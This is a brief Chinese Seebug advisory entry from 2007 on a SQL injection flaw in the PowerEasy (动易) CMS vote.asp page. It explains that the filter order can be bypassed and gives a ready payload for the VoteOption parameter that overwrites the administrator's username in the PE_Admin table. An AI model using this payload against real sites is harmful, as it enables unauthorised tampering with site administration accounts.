动易vote.asp注入漏洞

2007-10-31T00:00:00
ID SSV:2365
Type seebug
Reporter Root
Modified 2007-10-31T00:00:00

Description

以下是一些细节。 VoteOption参数注入(其他的参数就没看了) 他们先过滤了"--"再过滤";"

动易 暂无

                                        
                                            
                                                VoteOption的值为1=1 update PE_Admin set adminname=0x61-;-时,修改管理员的用户名。